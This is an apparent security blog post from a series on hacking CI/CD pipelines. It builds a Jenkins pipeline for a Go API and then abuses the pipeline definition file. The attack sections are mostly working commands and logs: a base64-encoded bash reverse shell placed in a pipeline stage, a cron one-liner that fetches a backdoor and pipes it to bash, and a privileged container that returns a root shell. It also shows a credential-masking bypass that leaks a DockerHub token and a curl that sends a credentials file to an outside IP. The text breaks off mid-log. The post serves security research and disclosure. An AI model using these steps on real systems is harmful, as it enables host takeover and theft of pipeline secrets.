This is the continuation of the Hacking CI/CD Pipelines series where I look at five popular CI/CD tools to demonstrate how to abuse its functionality. If you have not read through part 1, it provides the context of the risks with CI/CD infrastructure, the two areas of focus for this series and an example application we’ll look to build in the pipeline. As a quick reminder, we’ll be looking at how to execute malicious code in the pipeline, specifically a reverse shell and how to grab sensitive credentials.
In this post, we’ll be covering the grand daddy of CI/CD pipelines, Jenkins.
For the setup and configuration of Jenkins, I’ve decided use a virtual machine as the underlying host and use docker containers for agents. This closely matches the setup I’ve seen whilst performing security reviews of Jenkins, abet a completely separate instance for a build node with containerised workloads running as build agents. As I won’t be looking at compromising sensitive files from the main Jenkins host, I thought this setup was good enough.
I’ve chosen Ubuntu 24.05 LTS as the underlying host and followed these installation guidelines with the LTS release. Once Jenkins is installed, along with it’s dependencies and the controller is unlocked, the administrator is asked about plugins. I choose to “Install suggested plugins” but there will likely be other plugins I’ll need once I start defining the pipeline.
For clarity, the Jenkins version is 2.492.2
and I’m using openjdk 17.0.14 2025-01-21
for java.
With that done, it’s time to consider what we need for the pipeline to build our example go api app.
For the pipeline I would like to perform the following steps:
For the go build, Jenkins has a go plugin where you define the go version for the build agent to pull and then within a build stage execute the necessary go commands. The command for executing the build is already defined in our Dockerfile
within the go api application GitHub Repository, which is:
go build -o demo-api -ldflags='-w -s' .
This will also allow us to perform the go unit tests as part of another pipeline stage.
go test ./...
Next we’ll need to integrate with Docker to perform the build and push to the registry. For this I’ve used the Docker Pipeline Plugin. It supports a number of global variables for running common methods for building and publishing containers.
For example, to build a Docker image it is as simple as:
docker.build "mycorp/myapp:${env.BUILD_TAG}"
As stated previously, I wanted to run the build agent as a Docker container. For this I would need to install Docker on the main host and the Docker Plugin. Docker was installed via the official guidelines using apt
.
For the configuration of the agent, I followed the official guide for using agents. This essentially involves:
Note: I originally configured the admin user as not
jenkins
. When attempting to connect to the Jenkins Docker Image (jenkins/ssh-agent:alpine-jdk17) with a username other than Jenkins it failed to connect. Additionally if there is no/home/jenkins
directory the container agent will fail to connect. Obviously this can be rectified by creating a custom Jenkins agent container image.
The last remaining configuration item is the access token to push to DockerHub. This is easily generated under the user account in DockerHub and placed as a username/password credential in Jenkins.
Before we start with defining the pipeline definition file (jenkinsfile
), there are a couple of options of building and testing the go application. The entire build and test of the application could have been performed insider a container but this would mean that Dockerfile
would not be slim, that is the go tools would need to included in the published container image. I’m a strong believer in multi-staged builds and reducing the number of tools in the image as possible. So this breaks that methodology. I could have created a separate Dockerfile which was just used for testing but again this is another configuration item to manage (but I guess in my case it’s just dependabot maintaining the majority of it). Ultimately, I made the decision to keep it simplistic and leverage the go plugin.
Regarding using the docker agent, the image provided in the Jenkins guidelines does not include docker
as such it would require building a custom one. If I were to do this, I would likely need to run “docker in docker” as the agent to mount the docker socket. To reduce the complexity, many administrators will run the agent as privileged
which is hugely dangerous. Again to reduce the complexity and keep the pipeline simplistic, the agent was set to any
instead of label "agent"
. As there are no other builds occurring on the Jenkins Server, it will run the pipeline on it rather than choosing an agent.
Note: I will return to the Jenkins build agent container to review the attack surface to see what is possible.
Below is the final pipeline definition file.
pipeline {
agent any
tools { go '1.24.1' }
environment {
REPO = 'https://github.com/wakeward/demo-api-app.git'
IMAGE_TAG = 'wakeward/demo-api-app'
DOCKERHUB = 'wakeward-dockerhub'
}
stages {
stage('checkout source code') {
steps {
git (url: "${REPO}", branch: 'main')
}
}
stage('building go binary') {
steps {
echo 'Building go binary...'
sh "go build -o demo-api -ldflags='-w -s' ."
}
}
stage('run unit tests') {
steps{
script {
echo 'Running unit tests...'
sh "go test ./..."
}
}
}
stage('build container image') {
steps{
script {
echo 'Building container image...'
docker_image = docker.build("${IMAGE_TAG}:${env.BUILD_TAG}")
}
}
}
stage('push container image') {
steps{
script {
echo 'Pushing container image to Dockerhub...'
withDockerRegistry(url: '', credentialsId: "${DOCKERHUB}") {
docker_image.push()
}
}
}
}
}
post {
success {
echo 'Deployment completed successfully.'
}
failure {
echo 'Deployment failed. Please check the logs.'
}
}
}
The pipeline executed successfully and I’ve taken a few interesting snippets from the build log. The first is the cloning the GitHub repository, where we can see that no credentials were specified as it public. If private, it presents us with another token to exfiltrate.
[Pipeline] git
The recommended git tool is: NONE
No credentials specified
Cloning the remote Git repository
Cloning repository https://github.com/wakeward/demo-api-app.git
> git init /var/lib/jenkins/workspace/demo-go-api-pipeline # timeout=10
Fetching upstream changes from https://github.com/wakeward/demo-api-app.git
> git --version # timeout=10
> git --version # 'git version 2.43.0'
> git fetch --tags --force --progress -- https://github.com/wakeward/demo-api-app.git +refs/heads/*:refs/remotes/origin/* # timeout=10
> git config remote.origin.url https://github.com/wakeward/demo-api-app.git # timeout=10
> git config --add remote.origin.fetch +refs/heads/*:refs/remotes/origin/* # timeout=10
Avoid second fetch
> git rev-parse refs/remotes/origin/main^{commit} # timeout=10
Checking out Revision 3d1abdd361e6a6b66e64e97faea4155e3bc33e5a (refs/remotes/origin/main)
> git config core.sparsecheckout # timeout=10
> git checkout -f 3d1abdd361e6a6b66e64e97faea4155e3bc33e5a # timeout=10
> git branch -a -v --no-abbrev # timeout=10
> git checkout -b main 3d1abdd361e6a6b66e64e97faea4155e3bc33e5a # timeout=10
Commit message: "fix: update demo api application with dockerfile and version bump"
The next part of the log to show is the stage pushing to DockerHub.
Pushing container image to Dockerhub...
[Pipeline] withDockerRegistry
$ docker login -u wakeward -p ******** https://index.docker.io/v1/
WARNING! Using --password via the CLI is insecure. Use --password-stdin.
WARNING! Your credentials are stored unencrypted in '/var/lib/jenkins/workspace/demo-go-api-pipeline@tmp/1ca36096-b1e5-40b0-bbee-03a8be752152/config.json'.
Configure a credential helper to remove this warning. See
https://docs.docker.com/go/credential-store/
Login Succeeded
The configuration for pushing to DockerHub was based on guidelines from the Docker Pipeline Plugin. The first warning is normal if you are not using stdin
for the password. Fortunately it is automatically masked by Jenkins to ensure it is leaked into the log. The second warning is more worrying. The credentials are placed into a local directory but since the execution of the pipeline I’ve restarted the jenkins instance and the files no longer exists.
wakeward@jenkins:/var/lib/jenkins/workspace/demo-go-api-pipeline@tmp$ ls -la
total 8
drwxr-xr-x 2 jenkins jenkins 4096 Mar 16 00:12 .
drwxr-xr-x 8 jenkins jenkins 4096 Mar 19 21:40 ..
This demonstrates the importance of not persisting build agents. Credentials can always be leaked or temporarily stored on the agent and if compromised by an adversary could harvest anything left from all the builds. Additionally an adversary could look to install persistence on the agent (looking to pivot to other accessible services) and not destroying the build agent will allow them to stay within an internal network.
With the container image built, we can check it by pulling it from DockerHub and testing it out.
docker pull wakeward/demo-api-app:jenkins-demo-go-api-pipeline-1
jenkins-demo-go-api-pipeline-1: Pulling from wakeward/demo-api-app
2445dbf7678f: Already exists
f291067d32d8: Already exists
d50622aa9b3f: Pull complete
Digest: sha256:a4c2dec8574773d3dcdc5fc4089690d47d514f98ad9cf12e5b6c92382a6ffc97
Status: Downloaded newer image for wakeward/demo-api-app:jenkins-demo-go-api-pipeline-1
docker.io/wakeward/demo-api-app:jenkins-demo-go-api-pipeline-1
docker run -it --rm -p 8080:8080 wakeward/demo-api-app:jenkins-demo-go-api-pipeline-1
[GIN-debug] [WARNING] Creating an Engine instance with the Logger and Recovery middleware already attached.
[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production.
- using env: export GIN_MODE=release
- using code: gin.SetMode(gin.ReleaseMode)
[GIN-debug] GET /api/v1/healthcheck --> github.com/wakeward/demo-api-app/controllers.HealthCheck (3 handlers)
[GIN-debug] GET /swagger/*any --> github.com/swaggo/gin-swagger.CustomWrapHandler.func1 (3 handlers)
[GIN-debug] [WARNING] You trusted all proxies, this is NOT safe. We recommend you to set a value.
Please check https://pkg.go.dev/github.com/gin-gonic/gin#readme-don-t-trust-all-proxies for details.
[GIN-debug] Listening and serving HTTP on :8080
curl http://localhost:8080/api/v1/healthcheck
service is running
With a working pipeline, let’s get to hacking!
Executing malicious code is pretty trivial as the pipeline allows us to execute shell commands. A bash reverse shell is simply:
bash -i >& /dev/tcp/<IP-ADDR>/<PORT> 0>&1
My preference is always to encode this one liner, just in case there is an issue with processing the characters. This is achieved by base64
encoding the one liner, echoing it out and piping it to bash.
echo "YmFzaCAtaSA+JiAvZGV2L3RjcC88SVAtQUREUj4vPFBPUlQ+IDA+JjEK" | base64 -d | bash
This is simply put into a pipeline stage like this:
...
stages {
stage('reverse shell') {
steps {
sh 'echo "YmFzaCAtaSA+JiAvZGV2L3RjcC88SVAtQUREUj4vPFBPUlQ+IDA+JjEK" | base64 -d | bash'
}
}
}
...
Rather than start by attacking the host, we’ll focus on the build agent container. To force the pipeline to use the agent, it is as simple as specifying:
pipeline {
agent { label "agent1" }
...
Running this we receive our reverse shell but the pipeline is stuck running due to open connection.
Started by user jenkins
[Pipeline] Start of Pipeline
[Pipeline] node
Running on Jenkins in /var/lib/jenkins/workspace/cred-dump-test
[Pipeline] {
[Pipeline] withEnv
[Pipeline] {
[Pipeline] stage
[Pipeline] { (Declarative: Tool Install)
[Pipeline] tool
[Pipeline] envVarsForTool
[Pipeline] }
[Pipeline] // stage
[Pipeline] withEnv
[Pipeline] {
[Pipeline] stage
[Pipeline] { (reverse shell)
[Pipeline] tool
[Pipeline] envVarsForTool
[Pipeline] withEnv
[Pipeline] {
[Pipeline] sh
+ echo YmFzaCAtaSA+JiAvZGV2L3RjcC88SVAtQUREUj4vPFBPUlQ+IDA+JjEK
+ base64 -d
+ bash
Reverse Connection:
wakeward@ubu-skyhook-2024:~$ nc -lnvp 4444
Listening on 0.0.0.0 4444
Connection received on <JENKINS-PUBLIC-IP> 59437
bash: cannot set terminal process group (1423): Inappropriate ioctl for device
bash: no job control in this shell
7e1ba0bc527e:~/workspace/cred-dump-test$ id
id
uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins),1000(jenkins)
Having the pipeline stuck with the connection is far from ideal. Also inspecting the pipeline definition file, it is clear what is happening. So what else can we do?
A better method is to install backdoor on the underlying host. A cron job is often used by adversaries to install persistence and obtain C2 connectivity from the compromised host.
Here is a one liner used by an adversary to install a C2 implant.
chattr -ia /etc/cron.d; (echo '* * * * * root (curl -k http://<ENDPOINT>:<PORT>/backdoor | bash); rm /etc/cron.d/1weekly' > /etc/cron.d/1weekly)
This is uses chattr
to change the attributes of a linux file, in this instance it ensuring that any files under the /etc/cron.d
directory can be modified (e.g. remove immutability and only being able to append). Next it’s writing a cron
entry to execute every minute to download a backdoor
and execute that with bash
. Once this has completed, remove itself from the /etc/cron.d
directory. The backdoor would likely be a C2 implant that would maintain persistence on the host.
Whilst this is useful there is two issues here:
root
level permissions to modify the cron.d
filesLet’s see if we can workaround these limitations and attempt to obtain root
permissions.
The docker build agent is run with the following command:
docker run -d --rm --name=agent1 -p 22:22 -e "JENKINS_AGENT_SSH_PUBKEY=<PUBLIC-KEY> jenkins@jenkins" jenkins/ssh-agent:alpine-jdk17
Normally docker
is run as a privileged operation where the easiest solution is adding a user to the docker group. This is what I’ve done in my Jenkins setup and it is confirmed by looking at the processes running:
ps -ef | grep docker
root 1557 1 0 10:02 ? 00:00:04 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root 3874 1557 0 10:03 ? 00:00:01 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 22 -container-ip 172.17.0.2 -container-port 22 -use-listen-fd
root 3879 1557 0 10:03 ? 00:00:00 /usr/bin/docker-proxy -proto tcp -host-ip :: -host-port 22 -container-ip 172.17.0.2 -container-port 22 -use-listen-fd
If we are able to breakout of the container, there is a good chance we’ll be able to leverage the root
user account. But what permissions have we been given in the build agent.
We can find this out by looking under /proc/
for the running container:
7e1ba0bc527e:~/caches/durable-task$ cat /proc/1/status | grep Cap
cat /proc/1/status | grep Cap
CapInh: 0000000000000000
CapPrm: 00000000a80425fb
CapEff: 00000000a80425fb
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000
A quick look to what that translates to give us this:
capsh --decode=00000000a80425fb
0x00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
The linux capabilities listed do not provide a means to escape the build agent container. If you want to know more about capabilities that may allow an escape, this is an excellent post.
If linux capabilities cannot be used, let’s see if we have access to any sensitive mount points.
7e1ba0bc527e:/home/jenkins# mount
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/CLOKSL2URXBOYPCY6CFPROIHLH:/var/lib/docker/overlay2/l/BPH5AR45CKTUWYECL4UHJ2QFHJ:/var/lib/docker/overlay2/l/TMZJDPGHB6OVFYFZSQ6MPGKKVW:/var/lib/docker/overlay2/l/6DQLKCANHC36QDBJFYDDR2VPXI:/var/lib/docker/overlay2/l/5AOHH76A5SVL3FGN3CL2MZB4G5:/var/lib/docker/overlay2/l/XJDBNISOTFMX7EERPINB64N7II:/var/lib/docker/overlay2/l/EBVOV5Q7MKG3OVQE5CGAKRLERJ:/var/lib/docker/overlay2/l/OKBYO4M5UWY5XASXBDLEF2JZAO:/var/lib/docker/overlay2/l/P2MAW34RACN5MYWTEIUAQHXNJX,upperdir=/var/lib/docker/overlay2/e4fe50a82c1862ca202b2777d6789349047ba946ddf3617aac441195e6d74da2/diff,workdir=/var/lib/docker/overlay2/e4fe50a82c1862ca202b2777d6789349047ba946ddf3617aac441195e6d74da2/work,nouserxattr)
...
/dev/sda2 on /home/jenkins/.jenkins type ext4 (rw,relatime)
/dev/sda2 on /home/jenkins/agent type ext4 (rw,relatime)
...
From the mount points we can see the docker overlay which is useful if you ever want to know if you are in a container or not, but there are two more which are non-standard. There are mounted directories from the Jenkins host. If we search for files which have suid
or sgid
configured, we find the following:
7e1ba0bc527e:/home/jenkins# find / -perm /4000
7e1ba0bc527e:/home/jenkins# find / -perm /2000
/home/jenkins
/home/jenkins/.jenkins
/home/jenkins/agent
/home/jenkins/.ssh
This is interesting as if we can create an executable file in one of these directories, add the suid permissions bit and the execute it from outside the container, we could run the executable file with root privileges. Let’s create a script on the agent directory:
7e1ba0bc527e:~/agent$ touch rs.sh
7e1ba0bc527e:~/agent$ echo "bash -i >& /dev/tcp/<ADVERSARY-PUBLIC-IP>/4444 0>&1" > rs.sh
7e1ba0bc527e:~/agent$ chmod u+sx rs.sh
7e1ba0bc527e:~/agent$ ls -la
total 16
drwxr-sr-x 2 jenkins jenkins 4096 Mar 26 20:36 .
drwxr-sr-x 1 jenkins jenkins 4096 Mar 26 11:56 ..
-rwsr--r-- 1 jenkins jenkins 45 Mar 26 20:36 rs.sh
As we have access to underlying host, we can check where that script has been created.
root@jenkins:~# find / -name rs.sh 2>/dev/null
/var/lib/docker/volumes/a041105f741f22cb1a0ed9ea9fe8b24bf0f20bb9e9ef4d480bda97bd096f6798/_data/rs.sh
If we manually execute this, we receive a reverse shell connection as root π
Jenkins Host:
/var/lib/docker/volumes/a041105f741f22cb1a0ed9ea9fe8b24bf0f20bb9e9ef4d480bda97bd096f6798/_data/rs.sh
Adversary Host:
wakeward@ubu-skyhook-2024:~$ nc -lnvp 4444
Listening on 0.0.0.0 4444
Connection received on <JENKINS-PUBLIC-IP> 64174
root@jenkins:/home/wakeward# id
id
uid=0(root) gid=0(root) groups=0(root)
This is progress. The next question is how to do we get root to trigger this file?
I reported this security finding to the Jenkins Team and was told: “You should only run a Docker agent inside a VM with no valuable information. Perhaps the docs could be clarified, that is all.”
At this point you may have noticed the .ssh
directory having a sgid but remember it is not mapped to a mount point on the underlying host.
Looking for Jenkins processes on the host returns a few relevant results:
ps -ef | grep [j]enkins
avahi 1027 1 0 20:05 ? 00:00:00 avahi-daemon: running [jenkins.local]
jenkins 1437 1 10 20:06 ? 00:00:59 /usr/bin/java -Djava.awt.headless=true -jar /usr/share/java/jenkins.war --webroot=/var/cache/jenkins/war --httpPort=8080
root 5652 5570 0 20:13 ? 00:00:00 sshd-session: jenkins [priv]
wakeward 5655 5652 0 20:13 ? 00:00:00 sshd-session: jenkins@notty
wakeward 5663 5655 4 20:13 ? 00:00:05 java -jar remoting.jar -workDir /home/jenkins -jar-cache /home/jenkins/remoting/jarCache
The primary process is executed as jenkins
and in the current configuration, that user does not have sudo permissions:
sudo -l -U jenkins
User jenkins is not allowed to run sudo on jenkins.
Once again we can see the docker container process running as root.
root 1592 1 0 20:06 ? 00:00:01 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root 5605 1592 0 20:13 ? 00:00:00 \_ /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 22 -container-ip 172.17.0.2 -container-port 22 -use-listen-fd
root 5611 1592 0 20:13 ? 00:00:00 \_ /usr/bin/docker-proxy -proto tcp -host-ip :: -host-port 22 -container-ip 172.17.0.2 -container-port 22 -use-listen-fd
...
root 5548 1 0 20:13 ? 00:00:00 /usr/bin/containerd-shim-runc-v2 -namespace moby -id f454e57be9d28bae3d2d24badfd0309595c76661788d02f9c49a14c5ce101084 -address /run
root 5570 5548 0 20:13 ? 00:00:00 \_ sshd: /usr/sbin/sshd -D -e [listener] 0 of 10-100 startups
root 5652 5570 0 20:13 ? 00:00:00 \_ sshd-session: jenkins [priv]
wakeward 5655 5652 2 20:13 ? 00:00:00 \_ sshd-session: jenkins@notty
wakeward 5663 5655 19 20:13 ? 00:00:04 \_ java -jar remoting.jar -workDir /home/jenkins -jar-cache /home/jenkins/remoting/jarCache
The only way we could leverage this is using the privileged
(or equivalent) flag which will break the linux namespacing. Let’s remember that all we have access to in this scenario is the pipeline definition file so we won’t be able to affect the running docker agent but we could specify a privileged container in the pipeline. At this point, the previous steps are a little superfluous as we could just execute the whole process as a privileged container.
stages {
stage('privileged reverse shell') {
steps{
script {
echo 'Building container image...'
docker.image('ubuntu:latest').withRun('--privileged --user=root:root --privileged --net=host --pid=host --ipc=host') { c ->
sh 'echo "YmFzaCAtaSA+JiAvZGV2L3RjcC88SVAtQUREUj4vPFBPUlQ+IDA+JjEK" | base64 -d | bash'
}
}
}
}
}
Using our one liner returns a privileged process but only with the jenkins
user.
wakeward@ubu-skyhook-2024:~$ nc -lnvp 4444
Listening on 0.0.0.0 4444
Connection received on <JENKINS-PUBLIC-IP> 56991
jenkins@jenkins:~/workspace/cred-dump-test$ capsh --print | grep cap
capsh --print | grep cap
Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read,cap_perfmon,cap_bpf,cap_checkpoint_restore
This is because we are piping our reverse shell into a bash session which is not root. To receive a root
reverse shell, we’ll need to create a container which launches it via a script, as parsing directly will return the input device is not a TTY
from the Jenkins pipeline. Our pipeline stage becomes:
stage('privileged reverse shell') {
steps{
script {
echo 'Building container image...'
sh 'docker run --user=root:root --privileged --net=host --pid=host --ipc=host -e IP=<ADVERSARY-PUBLIC-IP> -e PORT=4444 wakeward/bash-rs:latest'
}
}
}
And we receive a root
reverse shell.
wakeward@ubu-skyhook-2024:~$ nc -lnvp 4444
Listening on 0.0.0.0 4444
Connection received on <JENKINS-PUBLIC-IP> 65096
root@jenkins:/# id
id
uid=0(root) gid=0(root) groups=0(root)
At this point we are root
and we can install our C2 server on the Jenkins Server.
Note: I was disappointed not be able to leverage the mount point and
suid
method but it’s worth noting the docker volume directory is not accessible by unprivileged system users. This means the file is restricted to privileged users only but remains fairly stealthy to drop a script on a Jenkins host.
Before we move on, let’s perform a vulnerability scan to see if there is anything we could leverage within our pipeline.
trivy image jenkins/ssh-agent:alpine-jdk17
2025-03-31T01:12:48+01:00 INFO [vulndb] Need to update DB
2025-03-31T01:12:48+01:00 INFO [vulndb] Downloading vulnerability DB...
2025-03-31T01:12:48+01:00 INFO [vulndb] Downloading artifact... repo="mirror.gcr.io/aquasec/trivy-db:2"
61.66 MiB / 61.66 MiB [--------------------------------------------------------------------------------------------------------------------------------------] 100.00% 4.55 MiB p/s 14s
2025-03-31T01:13:03+01:00 INFO [vulndb] Artifact successfully downloaded repo="mirror.gcr.io/aquasec/trivy-db:2"
2025-03-31T01:13:03+01:00 INFO [vuln] Vulnerability scanning is enabled
2025-03-31T01:13:03+01:00 INFO [secret] Secret scanning is enabled
2025-03-31T01:13:03+01:00 INFO [secret] If your scanning is slow, please try '--scanners vuln' to disable secret scanning
2025-03-31T01:13:03+01:00 INFO [secret] Please see also https://trivy.dev/v0.61/docs/scanner/secret#recommendation for faster secret detection
2025-03-31T01:13:05+01:00 INFO [javadb] Downloading Java DB...
2025-03-31T01:13:05+01:00 INFO [javadb] Downloading artifact... repo="mirror.gcr.io/aquasec/trivy-java-db:1"
705.31 MiB / 705.31 MiB [----------------------------------------------------------------------------------------------------------------------------------] 100.00% 5.28 MiB p/s 2m14s
2025-03-31T01:15:19+01:00 INFO [javadb] Artifact successfully downloaded repo="mirror.gcr.io/aquasec/trivy-java-db:1"
2025-03-31T01:15:19+01:00 INFO [javadb] Java DB is cached for 3 days. If you want to update the database more frequently, "trivy clean --java-db" command clears the DB cache.
2025-03-31T01:15:19+01:00 INFO Detected OS family="alpine" version="3.21.3"
2025-03-31T01:15:19+01:00 INFO [alpine] Detecting vulnerabilities... os_version="3.21" repository="3.21" pkg_num=47
2025-03-31T01:15:19+01:00 INFO Number of language-specific files num=0
2025-03-31T01:15:19+01:00 WARN Using severities from other vendors for some vulnerabilities. Read https://trivy.dev/v0.61/docs/scanner/vulnerability#severity-selection for details.
Report Summary
ββββββββββββββββββββββββββββββββββββββββββββββββββ¬βββββββββ¬ββββββββββββββββββ¬ββββββββββ
β Target β Type β Vulnerabilities β Secrets β
ββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββΌββββββββββββββββββΌββββββββββ€
β jenkins/ssh-agent:alpine-jdk17 (alpine 3.21.3) β alpine β 1 β - β
ββββββββββββββββββββββββββββββββββββββββββββββββββ΄βββββββββ΄ββββββββββββββββββ΄ββββββββββ
Legend:
- '-': Not scanned
- '0': Clean (no security findings detected)
jenkins/ssh-agent:alpine-jdk17 (alpine 3.21.3)
Total: 1 (UNKNOWN: 0, LOW: 0, MEDIUM: 0, HIGH: 1, CRITICAL: 0)
ββββββββββββ¬ββββββββββββββββ¬βββββββββββ¬βββββββββ¬ββββββββββββββββββββ¬ββββββββββββββββ¬ββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Library β Vulnerability β Severity β Status β Installed Version β Fixed Version β Title β
ββββββββββββΌββββββββββββββββΌβββββββββββΌβββββββββΌββββββββββββββββββββΌββββββββββββββββΌββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β libexpat β CVE-2024-8176 β HIGH β fixed β 2.6.4-r0 β 2.7.0-r0 β libexpat: expat: Improper Restriction of XML Entity β
β β β β β β β Expansion Depth in libexpat β
β β β β β β β https://avd.aquasec.com/nvd/cve-2024-8176 β
ββββββββββββ΄ββββββββββββββββ΄βββββββββββ΄βββββββββ΄ββββββββββββββββββββ΄ββββββββββββββββ΄ββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Only a single vulnerability is returned, of which that is related to recursively expanding XML entities and doesn’t seem realistic to exploit in the pipeline.
Ah well…Time to steal some credentials!
As previously demonstrated for a functional pipeline we have seen that Jenkins automatically masks credentials in the build log. But as quick reminder:
Pushing container image to Dockerhub...
[Pipeline] withDockerRegistry
$ docker login -u wakeward -p ******** https://index.docker.io/v1/
If we were to attempt to simply echo
out the credentials in the pipeline definition file, it returns the following:
pipeline {
agent any
tools { go '1.24.1' }
environment {
DOCKERHUB = 'wakeward-dockerhub'
}
stages {
stage('outputting creds') {
steps {
withCredentials([usernamePassword(credentialsId: "${DOCKERHUB}", usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD')]){
sh βecho $PASSWORD'
}
}
}
}
}
Started by user jenkins
[Pipeline] Start of Pipeline
[Pipeline] node
Running on Jenkins in /var/lib/jenkins/workspace/cred-dump-test
[Pipeline] {
[Pipeline] withEnv
[Pipeline] {
[Pipeline] stage
[Pipeline] { (Declarative: Tool Install)
[Pipeline] tool
[Pipeline] envVarsForTool
[Pipeline] }
[Pipeline] // stage
[Pipeline] withEnv
[Pipeline] {
[Pipeline] stage
[Pipeline] { (outputting creds)
[Pipeline] tool
[Pipeline] envVarsForTool
[Pipeline] withEnv
[Pipeline] {
[Pipeline] withCredentials
Masking supported pattern matches of $PASSWORD
[Pipeline] {
[Pipeline] echo
Warning: A secret was passed to "echo" using Groovy String interpolation, which is insecure.
Affected argument(s) used the following variable(s): [PASSWORD]
See https://jenkins.io/redirect/groovy-string-interpolation for details.
DockerHub Creds: ****
Again Jenkins automatically detects the credential based on the fact the pipeline is using a withCredentials
parameter and the passwordVariable
. We can attempt to circumvent this by trying another method such as writing the credentials to a file and cat
it out.
pipeline {
agent any
tools { go '1.24.1' }
environment {
DOCKERHUB = 'wakeward-dockerhub'
}
stages {
stage('outputting creds') {
steps {
withCredentials([usernamePassword(credentialsId: "${DOCKERHUB}", usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD')]){
writeFile([file: "creds.txt", text: "${PASSWORD}"])
sh 'cat creds.txt'
}
}
}
}
}
Started by user jenkins
[Pipeline] Start of Pipeline
[Pipeline] node
Running on Jenkins in /var/lib/jenkins/workspace/cred-dump-test
[Pipeline] {
[Pipeline] withEnv
[Pipeline] {
[Pipeline] stage
[Pipeline] { (Declarative: Tool Install)
[Pipeline] tool
[Pipeline] envVarsForTool
[Pipeline] }
[Pipeline] // stage
[Pipeline] withEnv
[Pipeline] {
[Pipeline] stage
[Pipeline] { (outputting creds)
[Pipeline] tool
[Pipeline] envVarsForTool
[Pipeline] withEnv
[Pipeline] {
[Pipeline] withCredentials
Masking supported pattern matches of $PASSWORD
[Pipeline] {
[Pipeline] writeFile
Warning: A secret was passed to "writeFile" using Groovy String interpolation, which is insecure.
Affected argument(s) used the following variable(s): [PASSWORD]
See https://jenkins.io/redirect/groovy-string-interpolation for details.
[Pipeline] sh
+ cat creds.txt
****
Once again, Jenkins detects this and prevents the credentials from being leaked. At this point I began to play with the pipeline definition to manipulate the credentials via encoding and validate the robustness of the masking functionality. In doing so I incorrectly defined some pipeline arguments which returned the following exception:
pipeline {
agent any
tools { go '1.24.1' }
environment {
DOCKERHUB = 'wakeward-dockerhub'
}
stages {
stage('outputting creds') {
steps {
withCredentials([usernamePassword(credentialsId: "${DOCKERHUB}", usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD')]){
writeFile([file: "creds.txt", text: "${PASSWORD}", encoding: 'Base64']){
sh 'cat creds.txt'
}
}
}
}
}
}
Started by user jenkins
[Pipeline] Start of Pipeline
[Pipeline] node
Running on Jenkins in /var/lib/jenkins/workspace/cred-dump-test
[Pipeline] {
[Pipeline] withEnv
[Pipeline] {
[Pipeline] stage
[Pipeline] { (Declarative: Tool Install)
[Pipeline] tool
[Pipeline] envVarsForTool
[Pipeline] }
[Pipeline] // stage
[Pipeline] withEnv
[Pipeline] {
[Pipeline] stage
[Pipeline] { (outputting creds)
[Pipeline] tool
[Pipeline] envVarsForTool
[Pipeline] withEnv
[Pipeline] {
[Pipeline] withCredentials
Masking supported pattern matches of $PASSWORD
[Pipeline] {
[Pipeline] }
[Pipeline] // withCredentials
[Pipeline] }
[Pipeline] // withEnv
[Pipeline] }
[Pipeline] // stage
[Pipeline] }
[Pipeline] // withEnv
[Pipeline] }
[Pipeline] // withEnv
[Pipeline] }
[Pipeline] // node
[Pipeline] End of Pipeline
Also: org.jenkinsci.plugins.workflow.actions.ErrorAction$ErrorId: 2cc26690-eb1f-411f-a8e1-53f7eaa11e20
java.lang.IllegalArgumentException: Expected named arguments but got [{file=/tmp/creds, text=dckr_pat_<REDACTED>, encoding=Base64}, org.jenkinsci.plugins.workflow.cps.CpsClosure2@6f6fbc23]
πͺ BINGO πͺ the DockerHub PAT (dckr_pat_<REDACTED>
) is dumped out into the build log.
I reported this security finding to the Jenkins Team on 21st March 2025, it was acknowledged on 24th March 2025 and closed as a duplicate finding. I’ve not received any notifications that this issue is fixed and looking at the security advisory page there is no release addressing it. As it is way past the 90 days responsible disclosure time and the vulnerability is low in severity, I decided to publish this blog article.
Whilst dumping the credentials into the build log has restrictions, sending the credentials to a public endpoint is simple. Before we potentially expose an active DockerHub PAT to the internet, let’s change it out for a representative username and password.
pipeline {
agent any
tools { go '1.24.1' }
environment {
REPO = 'https://github.com/wakeward/demo-api-app.git'
IMAGE_TAG = 'wakeward/demo-api-app'
SECRET = 'test-secret'
}
stages {
stage('outputting creds') {
steps {
withCredentials([usernamePassword(credentialsId: "${SECRET}", usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD')]){
writeFile([file: "creds.txt", text: "${PASSWORD}"])
sh 'curl http://PUBLIC_IP:4444 --data "@creds.txt"'
}
}
}
}
}
Started by user jenkins
[Pipeline] Start of Pipeline
[Pipeline] node
Running on Jenkins in /var/lib/jenkins/workspace/cred-dump-test
[Pipeline] {
[Pipeline] withEnv
[Pipeline] {
[Pipeline] stage
[Pipeline] { (Declarative: Tool Install)
[Pipeline] tool
[Pipeline] envVarsForTool
[Pipeline] }
[Pipeline] // stage
[Pipeline] withEnv
[Pipeline] {
[Pipeline] stage
